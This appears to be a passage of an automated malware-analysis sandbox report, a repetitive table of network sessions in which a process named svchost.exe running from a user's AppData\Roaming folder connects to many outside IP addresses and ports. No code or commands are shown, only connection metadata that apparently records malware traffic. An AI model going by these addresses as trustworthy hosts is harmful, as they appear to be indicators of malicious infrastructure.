                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4118192.168.2.56274662.33.53.248312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4119192.168.2.562763154.12.178.1072998556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4120192.168.2.562377193.239.58.92808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4121192.168.2.56281038.162.15.98312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4122192.168.2.562356217.112.80.2528056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4123192.168.2.562786203.96.177.2115500556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4124192.168.2.562618198.8.84.3414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4125192.168.2.556129162.214.170.1442534743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4126192.168.2.56280882.113.157.1223128056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4127192.168.2.562796194.163.137.106905056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4128192.168.2.56279035.154.71.72108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4129192.168.2.562835185.162.229.2158056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4130192.168.2.562800159.223.71.715915956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4131192.168.2.56281860.246.122.2448056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4132192.168.2.56290443.153.71.5844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4133192.168.2.56290643.153.71.5844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4134192.168.2.56290743.153.71.5844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4135192.168.2.56290843.153.71.5844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4136192.168.2.56281947.243.205.1312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4137192.168.2.562853172.64.80.558056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4138192.168.2.562857104.20.67.1138056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4139192.168.2.562839158.69.53.98930056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4140192.168.2.562843162.159.246.1358056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4141192.168.2.562865172.67.105.2348056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4142192.168.2.56282243.131.242.1621567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4143192.168.2.562875104.19.79.2388056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4144192.168.2.562827178.54.21.203808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4145192.168.2.562880104.21.223.1818056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4146192.168.2.56283145.179.71.90318056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4147192.168.2.562889162.159.241.58056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4148192.168.2.56282849.228.131.169500056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4149192.168.2.562435165.227.104.1224144356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4150192.168.2.56284018.135.133.116312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4151192.168.2.562898104.23.125.1178056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4152192.168.2.562740117.160.250.1318056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4153192.168.2.56288338.162.3.175312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4154192.168.2.562870130.162.213.175312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4155192.168.2.56291850.63.12.336146456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4156192.168.2.562845103.36.35.135808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4157192.168.2.56264623.225.72.122350056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4158192.168.2.563007202.159.19.21344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4159192.168.2.562881132.226.7.233027756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4160192.168.2.563010202.159.19.21344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4161192.168.2.562867111.90.150.109108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4162192.168.2.563011202.159.19.21344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4163192.168.2.562940104.16.143.1278056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4164192.168.2.562941172.67.181.1498056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4165192.168.2.562944104.25.231.1848056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4166192.168.2.563012202.159.19.21344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4167192.168.2.562945172.67.181.118056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4168192.168.2.562946198.8.84.3414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4169192.168.2.562899147.75.92.2511000656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4170192.168.2.563034202.159.35.18944356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4171192.168.2.563036202.159.35.18944356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4172192.168.2.562961104.20.56.718056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4173192.168.2.563038202.159.35.18944356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4174192.168.2.563040202.159.35.18944356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4175192.168.2.562976104.16.105.158056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4176192.168.2.562892161.97.163.522204056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4177192.168.2.56292643.163.192.31567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4178192.168.2.562925177.234.244.1743221356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4179192.168.2.56292313.40.239.130312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4180192.168.2.56298423.227.38.1988056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4181192.168.2.562995104.25.244.708056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4182192.168.2.562997104.16.105.1828056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4183192.168.2.562909185.81.153.162338956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4184192.168.2.56291277.91.74.778056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4185192.168.2.562884103.190.54.1418056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4186192.168.2.562949154.12.178.1072998556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4187192.168.2.563009159.89.138.1308056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4188192.168.2.56298323.152.40.15505056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4189192.168.2.563006104.18.254.768056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4190192.168.2.562951162.55.87.48556656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4191192.168.2.56302547.88.3.19808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192192.168.2.562879122.114.232.13780856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4193192.168.2.563046104.21.85.1098056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4194192.168.2.56297582.64.77.308056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4195192.168.2.563056104.23.141.1968056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4196192.168.2.563069104.19.138.48056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4197192.168.2.56296951.83.184.241919156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4198192.168.2.562993163.172.137.491637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4199192.168.2.563162202.159.60.6544356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4200192.168.2.563170202.159.60.6544356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4201192.168.2.56316941.86.252.9144356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4202192.168.2.563171202.159.60.6544356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4203192.168.2.56317241.86.252.9144356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4204192.168.2.5629748.222.152.1585555556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4205192.168.2.563173202.159.60.6544356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4206192.168.2.562955103.127.1.1308056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4207192.168.2.56300382.113.157.1223128056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4208192.168.2.56317441.86.252.9144356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4209192.168.2.56297961.133.66.69900256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4210192.168.2.56317641.86.252.9144356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4211192.168.2.563077104.16.107.2068056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4212192.168.2.56297393.90.212.2415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4213192.168.2.563072162.159.242.2308056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4214192.168.2.56296746.241.57.29108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4215192.168.2.563024104.249.29.74576756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4216192.168.2.563027164.163.133.13099956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4217192.168.2.56267579.110.196.145808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4218192.168.2.56303018.185.169.150312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4219192.168.2.56303160.246.122.2448056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4220192.168.2.563118203.30.191.348056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4221192.168.2.562696222.220.102.159800056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4222192.168.2.56304194.45.74.60808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4223192.168.2.563146104.16.25.2168056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4224192.168.2.563043187.40.1.12212856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4225192.168.2.563000124.160.118.183808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4226192.168.2.56272151.79.87.1444123056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4227192.168.2.563138104.16.108.428056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4228192.168.2.563159172.67.69.98056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4229192.168.2.563160104.16.108.2348056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4230192.168.2.56306247.243.205.1312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4231192.168.2.56326543.157.51.4344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4232192.168.2.56326743.157.51.4344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4233192.168.2.5629748.222.152.1585555543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4234192.168.2.562291103.97.179.115108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4235192.168.2.56326943.157.51.4344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4236192.168.2.563214185.238.228.2028056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4237192.168.2.563206104.17.171.798056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4238192.168.2.563112147.75.34.851000756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4239192.168.2.562566181.212.136.344899356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4240192.168.2.56314562.3.6.76312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4241192.168.2.563107128.199.202.122808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4242192.168.2.56311143.131.242.1621567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4243192.168.2.563236172.67.182.228056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4244192.168.2.56313651.75.126.1503414456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4245192.168.2.56313716.163.88.2288056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4246192.168.2.563121103.213.97.748056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4247192.168.2.563212107.180.88.415803756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4248192.168.2.56313991.189.177.189312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4249192.168.2.56315688.99.138.21696956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4250192.168.2.56257872.195.34.41414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4251192.168.2.563147148.72.209.174473456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4252192.168.2.563164150.109.243.1561567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4253192.168.2.563226162.223.116.758056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4254192.168.2.56323513.59.156.167312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4255192.168.2.563104185.118.153.110808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4256192.168.2.563259104.16.105.1988056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4257192.168.2.56318145.81.232.174808556176C:\Users\user\AppData\Roaming\svchost.exe
